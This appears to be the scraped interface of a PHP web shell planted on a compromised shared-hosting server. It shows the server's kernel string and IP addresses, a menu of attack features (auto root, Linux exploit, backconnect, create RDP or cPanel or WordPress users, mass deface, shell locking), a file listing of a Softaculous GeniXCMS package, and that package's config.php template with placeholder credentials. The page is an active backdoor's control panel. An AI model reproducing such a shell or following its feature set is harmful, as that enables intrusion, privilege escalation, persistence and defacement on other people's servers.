Linux br942.hostgator.com.br 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Apache
: 162.241.2.188 | : 18.119.107.255
Cant Read [ /etc/named.conf ]
8.2.22
manoe678
May The Force Be With You
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
MASS DEFACE
+ Create Folder
+ Create File
/
var /
softaculous /
genix /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
142
B
-rw-r--r--
config.php
1.19
KB
-rw-r--r--
edit.php
4.64
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
280
B
-rw-r--r--
import.php
2.96
KB
-rw-r--r--
info.xml
1.87
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
7.09
KB
-rw-r--r--
install.xml
989
B
-rw-r--r--
md5
9.3
KB
-rw-r--r--
notes.txt
106
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php if (defined('GX_LIB') === false) die("Direct Access Not Allowed!"); /** * GeniXCMS - Content Management System * * PHP Based Content Management System and Framework * * @package GeniXCMS * @since 0.0.1 build date 20140925 * @version 1.1.8 * @link https://github.com/semplon/GeniXCMS * * @author Puguh Wijayanto (www.metalgenix.com) * @copyright 2014-2020 Puguh Wijayanto * @license http://www.opensource.org/licenses/mit-license.php MIT * */error_reporting(0); // DB CONFIG define('DB_HOST', '[[softdbhost]]'); define('DB_NAME', '[[softdb]]'); define('DB_PASS', '[[softdbpass]]'); define('DB_USER', '[[softdbuser]]'); define('DB_DRIVER', 'mysqli'); define('SMART_URL', false); //set 'true' if you want use SMART URL (SEO Friendly URL) define('GX_URL_PREFIX', '.html'); define('ADMIN_DIR', 'gxadmin'); define('USE_MEMCACHED', false); define('SITE_ID', '[[SITE_ID]]'); ##################################// # DON't REMOVE or EDIT THIS. # ================================== # YOU WON'T BE ABLE TO LOG IN # IF IT CHANGED. PLEASE BE AWARE ##################################// define('SECURITY_KEY', '[[SECURITY_KEY]]'); // for security purpose, will be used for creating password
Close